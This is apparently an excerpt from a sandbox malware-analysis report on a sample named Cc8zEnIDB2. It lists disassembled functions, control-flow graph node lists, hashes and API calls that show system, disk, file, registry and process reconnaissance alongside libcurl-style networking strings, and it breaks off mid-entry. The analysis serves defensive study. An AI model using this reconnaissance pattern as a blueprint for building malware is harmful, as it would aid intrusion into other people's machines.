                                                      Function 0050F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                      • API String ID: 0-1590685507
                                                      • Opcode ID: bf5136502e0fc16edb7d8bca38edc79b5a356acd81d46c3bbbe593a988b3ddfa
                                                      • Instruction ID: d59deebe9fbe2bf722c5e513c36f841f16b1f5f777fa2590ce6230a4d23c9402
                                                      • Opcode Fuzzy Hash: bf5136502e0fc16edb7d8bca38edc79b5a356acd81d46c3bbbe593a988b3ddfa
                                                      • Instruction Fuzzy Hash: 48C2D531A043459FE724CF29C445B6ABBE1BF88314F05CA6DEC989B692D771ED84CB81
                                                      Function 004D255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 857 4d255d-4d2614 call 859f70 GetSystemInfo call 90f770 call 90f960 GlobalMemoryStatusEx call 90f770 call 90f960 939 4d2619 call 7150315 857->939 940 4d2619 call 7150395 857->940 941 4d2619 call 7150431 857->941 942 4d2619 call 71502f0 857->942 943 4d2619 call 71502f2 857->943 944 4d2619 call 715033e 857->944 945 4d2619 call 71503f9 857->945 946 4d2619 call 715041a 857->946 947 4d2619 call 71503ba 857->947 948 4d2619 call 7150304 857->948 949 4d2619 call 7150384 857->949 950 4d2619 call 71503e0 857->950 951 4d2619 call 7150443 857->951 952 4d2619 call 7150428 857->952 953 4d2619 call 71504ab 857->953 954 4d2619 call 715036b 857->954 868 4d261b-4d2620 869 4d277c-4d2904 call 90f770 call 90f960 KiUserCallbackDispatcher call 90f770 call 90f960 call 90f770 call 90f960 call 858e38 call 858be0 call 858bd0 FindFirstFileW 868->869 870 4d2626-4d2637 call 90f570 868->870 917 4d2928-4d292c 869->917 918 4d2906-4d2926 FindNextFileW 869->918 875 4d2754-4d275c 870->875 877 4d263c-4d264f GetDriveTypeA 875->877 878 4d2762-4d2777 call 90f960 875->878 880 4d2655-4d2685 GetDiskFreeSpaceExA 877->880 881 4d2743-4d2751 call 858b98 877->881 878->869 880->881 884 4d268b-4d273e call 90f840 call 90f8d0 call 90f960 call 90f660 call 90f960 call 90f660 call 90f960 call 90dce0 880->884 881->875 884->881 919 4d292e 917->919 920 4d2932-4d296f call 90f770 call 90f960 call 858e78 917->920 918->917 918->918 919->920 926 4d2974-4d2979 920->926 927 4d29a9-4d29fe call 85a290 call 90f770 call 90f960 926->927 928 4d297b-4d29a4 call 90f770 call 90f960 926->928 928->927 939->868 940->868 941->868 942->868 943->868 944->868 945->868 946->868 947->868 948->868 949->868 950->868 951->868 952->868 953->868 954->868
                                                      APIs
                                                      • GetSystemInfo.KERNELBASE ref: 004D2579
                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 004D25CC
                                                      • GetDriveTypeA.KERNELBASE ref: 004D2647
                                                      • GetDiskFreeSpaceExA.KERNELBASE ref: 004D267E
                                                      • KiUserCallbackDispatcher.NTDLL ref: 004D27E2
                                                      • FindFirstFileW.KERNELBASE ref: 004D28F8
                                                      • FindNextFileW.KERNELBASE ref: 004D291F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                      • String ID: ;%M$@$`
                                                      • API String ID: 3271271169-1184465558
                                                      • Opcode ID: fec01c5a809ce5dc1f01c16cf81e0f67aa33cfb2a827b62c173885abb6e16134
                                                      • Instruction ID: 47384b3c3b7f231909beac71f5057772a26b1318b0859bd93955e2d812523588
                                                      • Opcode Fuzzy Hash: fec01c5a809ce5dc1f01c16cf81e0f67aa33cfb2a827b62c173885abb6e16134
                                                      • Instruction Fuzzy Hash: 97D1B2B49057099FCB10EF68C59569EBBF0FF88344F00896AE898D7351E7749A84CF52
                                                      Function 004D29FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1376 4d29ff-4d2a2f FindFirstFileA 1377 4d2a38 1376->1377 1378 4d2a31-4d2a36 1376->1378 1379 4d2a3d-4d2a91 call 90f8d0 call 90f960 RegOpenKeyExA 1377->1379 1378->1379 1384 4d2a9a 1379->1384 1385 4d2a93-4d2a98 1379->1385 1386 4d2a9f-4d2b0c call 90f8d0 call 90f960 CharUpperA call 858da0 1384->1386 1385->1386 1394 4d2b0e-4d2b13 1386->1394 1395 4d2b15 1386->1395 1396 4d2b1a-4d2b92 call 90f8d0 call 90f960 call 858e80 call 858e70 1394->1396 1395->1396 1405 4d2bcc-4d2c66 QueryFullProcessImageNameA CloseHandle call 858da0 1396->1405 1406 4d2b94-4d2ba3 1396->1406 1416 4d2c6f 1405->1416 1417 4d2c68-4d2c6d 1405->1417 1409 4d2ba5-4d2bae 1406->1409 1410 4d2bb0-4d2bca call 858e68 1406->1410 1409->1405 1410->1405 1410->1406 1418 4d2c74-4d2ce9 call 90f8d0 call 90f960 call 858e80 call 858e70 1416->1418 1417->1418 1427 4d2dcf-4d2e1c call 90f8d0 call 90f960 CloseHandle 1418->1427 1428 4d2cef-4d2d49 call 858bb0 call 858da0 1418->1428 1469 4d2e21 call 71d0e3d 1427->1469 1470 4d2e21 call 71d0e4f 1427->1470 1471 4d2e21 call 71d0e8b 1427->1471 1472 4d2e21 call 71d0df1 1427->1472 1473 4d2e21 call 71d0e30 1427->1473 1474 4d2e21 call 71d0e60 1427->1474 1475 4d2e21 call 71d0e23 1427->1475 1476 4d2e21 call 71d0dc2 1427->1476 1439 4d2d99-4d2dad 1428->1439 1440 4d2d4b-4d2d63 call 858da0 1428->1440 1438 4d2e23-4d2e2e 1441 4d2e37 1438->1441 1442 4d2e30-4d2e35 1438->1442 1439->1427 1440->1439 1449 4d2d65-4d2d7d call 858da0 1440->1449 1443 4d2e3c-4d2ed6 call 90f8d0 call 90f960 1441->1443 1442->1443 1458 4d2ed8-4d2ee1 1443->1458 1459 4d2eea 1443->1459 1449->1439 1454 4d2d7f-4d2d97 call 858da0 1449->1454 1454->1439 1460 4d2daf-4d2dc9 call 858e68 1454->1460 1458->1459 1461 4d2ee3-4d2ee8 1458->1461 1462 4d2eef-4d2f16 call 90f8d0 call 90f960 1459->1462 1460->1427 1460->1428 1461->1462 1469->1438 1470->1438 1471->1438 1472->1438 1473->1438 1474->1438 1475->1438 1476->1438
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                      • String ID: 0
                                                      • API String ID: 2406880114-4108050209
                                                      • Opcode ID: 51dbddfa187b1a81fc91175308270fd3707a87e28ca3182396003de3f1f5a1e0
                                                      • Instruction ID: 1dc81fe51cf26f5ed9dbaee58510b7303ec093f04aede8e7cbee1cfeb11cc8f9
                                                      • Opcode Fuzzy Hash: 51dbddfa187b1a81fc91175308270fd3707a87e28ca3182396003de3f1f5a1e0
                                                      • Instruction Fuzzy Hash: A2E1C7B09053099FCB50EF68D99569EBBF4EF44344F40886AE898DB350E778DA49CF42
                                                      Function 004E05B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1529 4e05b0-4e05b7 1530 4e07ee 1529->1530 1531 4e05bd-4e05d4 1529->1531 1532 4e05da-4e05e6 1531->1532 1533 4e07e7-4e07ed 1531->1533 1532->1533 1534 4e05ec-4e05f0 1532->1534 1533->1530 1535 4e05f6-4e0620 call 4e7350 call 4d70b0 1534->1535 1536 4e07c7-4e07cc 1534->1536 1541 4e066a-4e068c call 50dec0 1535->1541 1542 4e0622-4e0624 1535->1542 1536->1533 1547 4e07d6-4e07e3 call 4e7380 1541->1547 1548 4e0692-4e06a0 1541->1548 1544 4e0630-4e0655 call 4d70d0 call 4e03c0 call 4e7450 1542->1544 1568 4e07ce 1544->1568 1569 4e065b-4e0668 call 4d70e0 1544->1569 1547->1533 1551 4e06f4-4e06f6 1548->1551 1552 4e06a2-4e06a4 1548->1552 1557 4e07ef-4e082b call 4e3000 1551->1557 1558 4e06fc-4e06fe 1551->1558 1555 4e06b0-4e06e4 call 4e73b0 1552->1555 1555->1547 1574 4e06ea-4e06ee 1555->1574 1572 4e0a2f-4e0a35 1557->1572 1573 4e0831-4e0837 1557->1573 1559 4e072c-4e0754 1558->1559 1564 4e075f-4e078b 1559->1564 1565 4e0756-4e075b 1559->1565 1586 4e0700-4e0703 1564->1586 1587 4e0791-4e0796 1564->1587 1570 4e075d 1565->1570 1571 4e0707-4e0719 WSAEventSelect 1565->1571 1568->1547 1569->1541 1569->1544 1579 4e0723-4e0726 1570->1579 1571->1547 1578 4e071f 1571->1578 1575 4e0a3c-4e0a52 1572->1575 1576 4e0a37-4e0a3a 1572->1576 1581 4e0839-4e084c call 4e6fa0 1573->1581 1582 4e0861-4e087e 1573->1582 1574->1555 1583 4e06f0 1574->1583 1575->1547 1584 4e0a58-4e0a81 call 4e2f10 1575->1584 1576->1575 1578->1579 1579->1557 1579->1559 1596 4e0a9c-4e0aa4 1581->1596 1597 4e0852 1581->1597 1593 4e0882-4e088d 1582->1593 1583->1551 1584->1547 1600 4e0a87-4e0a97 call 4e6df0 1584->1600 1586->1571 1587->1586 1591 4e079c-4e07c2 call 4d76a0 1587->1591 1591->1586 1598 4e0893-4e08b1 1593->1598 1599 4e0970-4e0975 1593->1599 1596->1547 1597->1582 1602 4e0854-4e085f 1597->1602 1603 4e08c8-4e08f7 1598->1603 1605 4e097b-4e0989 call 4d70b0 1599->1605 1606 4e0a19-4e0a2c 1599->1606 1600->1547 1602->1593 1613 4e08fd-4e0925 1603->1613 1614 4e08f9-4e08fb 1603->1614 1605->1606 1612 4e098f-4e099e 1605->1612 1606->1572 1615 4e09b0-4e09c1 call 4d70d0 1612->1615 1616 4e0928-4e093f 1613->1616 1614->1616 1620 4e09c3-4e09c7 1615->1620 1621 4e09a0-4e09ae call 4d70e0 1615->1621 1622 4e0945-4e096b 1616->1622 1623 4e08b3-4e08c2 1616->1623 1625 4e09e8-4e0a03 WSAEnumNetworkEvents 1620->1625 1621->1606 1621->1615 1622->1623 1623->1599 1623->1603 1627 4e0a05-4e0a17 1625->1627 1628 4e09d0-4e09e6 WSAEventSelect 1625->1628 1627->1628 1628->1621 1628->1625
                                                      APIs
                                                      • WSAEventSelect.WS2_32(?,?,?), ref: 004E0712
                                                      • WSAEventSelect.WS2_32(?,?,00000000), ref: 004E09DD
                                                      • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004E09FB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: EventSelect$EnumEventsNetwork
                                                      • String ID: N=M$multi.c
                                                      • API String ID: 2170980988-2986268608
                                                      • Opcode ID: c95bad41eaf0c6ccf7152cc3646631493799e260fca5755b5f0b884282672fb1
                                                      • Instruction ID: 3ce22536f8c1d4049070984a43b883ffbe06bc52b5dc20f9e081794704f53cd9
                                                      • Opcode Fuzzy Hash: c95bad41eaf0c6ccf7152cc3646631493799e260fca5755b5f0b884282672fb1
                                                      • Instruction Fuzzy Hash: 84D1E3716083819FE710DF62C881B6BB7E5FF94349F04482EF89486242E7B8E985CB56
                                                      Function 0059B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1816 59b180-59b195 1817 59b19b-59b1a2 1816->1817 1818 59b3e0-59b3e7 1816->1818 1819 59b1b0-59b1b9 1817->1819 1819->1819 1820 59b1bb-59b1bd 1819->1820 1820->1818 1821 59b1c3-59b1d0 1820->1821 1823 59b3db 1821->1823 1824 59b1d6-59b1f2 1821->1824 1823->1818 1825 59b229-59b22d 1824->1825 1826 59b3e8-59b417 1825->1826 1827 59b233-59b246 1825->1827 1834 59b41d-59b429 1826->1834 1835 59b582-59b589 1826->1835 1828 59b248-59b24b 1827->1828 1829 59b260-59b264 1827->1829 1831 59b24d-59b256 1828->1831 1832 59b215-59b223 1828->1832 1830 59b269-59b286 call 59af30 1829->1830 1844 59b288-59b2a3 call 59b060 1830->1844 1845 59b2f0-59b301 1830->1845 1831->1830 1832->1825 1837 59b315-59b33c call 858b00 1832->1837 1838 59b42b-59b433 call 59b590 1834->1838 1839 59b435-59b44c call 59b590 1834->1839 1847 59b3bf-59b3ca 1837->1847 1848 59b342-59b347 1837->1848 1838->1839 1855 59b458-59b471 call 59b590 1839->1855 1856 59b44e-59b456 call 59b590 1839->1856 1861 59b2a9-59b2c7 getsockname call 59b020 1844->1861 1862 59b200-59b213 call 59b020 1844->1862 1845->1832 1865 59b307-59b310 1845->1865 1857 59b3cc-59b3d9 1847->1857 1852 59b349-59b358 1848->1852 1853 59b384-59b38f 1848->1853 1859 59b360-59b382 1852->1859 1853->1847 1860 59b391-59b3a5 1853->1860 1874 59b48c-59b4a7 1855->1874 1875 59b473-59b487 1855->1875 1856->1855 1857->1818 1859->1853 1859->1859 1866 59b3b0-59b3bd 1860->1866 1872 59b2cc-59b2dd 1861->1872 1862->1832 1865->1857 1866->1847 1866->1866 1872->1832 1876 59b2e3 1872->1876 1877 59b4a9-59b4b1 call 59b660 1874->1877 1878 59b4b3-59b4cb call 59b660 1874->1878 1875->1835 1876->1865 1877->1878 1883 59b4d9-59b4f5 call 59b660 1878->1883 1884 59b4cd-59b4d5 call 59b660 1878->1884 1889 59b50d-59b52b call 59b770 * 2 1883->1889 1890 59b4f7-59b50b 1883->1890 1884->1883 1889->1835 1895 59b52d-59b531 1889->1895 1890->1835 1896 59b580 1895->1896 1897 59b533-59b53b 1895->1897 1896->1835 1898 59b578-59b57e 1897->1898 1899 59b53d-59b547 1897->1899 1898->1835 1899->1898 1900 59b549-59b54d 1899->1900 1900->1898 1901 59b54f-59b558 1900->1901 1901->1898 1902 59b55a-59b576 call 59b870 * 2 1901->1902 1902->1835 1902->1898
                                                      APIs
                                                      • getsockname.WS2_32(-00000020,-00000020,?), ref: 0059B2B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: getsockname
                                                      • String ID: ares__sortaddrinfo.c$cur != NULL
                                                      • API String ID: 3358416759-2430778319
                                                      • Opcode ID: 0bc208c026b7554e62d3dc3dc383138b43b907b693f245c55155867f100bc717
                                                      • Instruction ID: 8369d4815bcb398441306d064c173b5981ebabf56000e720da74dcdf2564376d
                                                      • Opcode Fuzzy Hash: 0bc208c026b7554e62d3dc3dc383138b43b907b693f245c55155867f100bc717
                                                      • Instruction Fuzzy Hash: 27C17F316043059FFF18DF24DA84A6A7BE1FF88714F058928E8498B3A2E735ED45CB81
                                                      Function 071903E6 Relevance: 2.0, APIs: 1, Instructions: 524COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76134ff3c4557313df55141874c94654568fbaa49980dcb614a7754d5f0acea2
                                                      • Instruction ID: bdef5698bf01c2444a13b6c4597bb68cf61180ab2a1373e800c18539006064a3
                                                      • Opcode Fuzzy Hash: 76134ff3c4557313df55141874c94654568fbaa49980dcb614a7754d5f0acea2
                                                      • Instruction Fuzzy Hash: CAB1C2EB66C123BDBA0A81452B54AFA677EE6CF730F328436F407C6582E3944B4B5171
                                                      Function 004E6FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 723ebcd3cc83060528b0efbdf205472189f5b638f261a8a81e4f5124e1cb38fe
                                                      • Instruction ID: e5fb0640803fec1ec4addd7ab464b0496cfd1c72f4e88690f224c5bc0530fd6c
                                                      • Opcode Fuzzy Hash: 723ebcd3cc83060528b0efbdf205472189f5b638f261a8a81e4f5124e1cb38fe
                                                      • Instruction Fuzzy Hash: 4B91263060C3898BD7358A2AC8847BBB2D5FFC4371F148B2EE998432D4E7789D41D696
                                                      Function 0059A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0058712E,?,?,?,00001001,00000000), ref: 0059A90D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
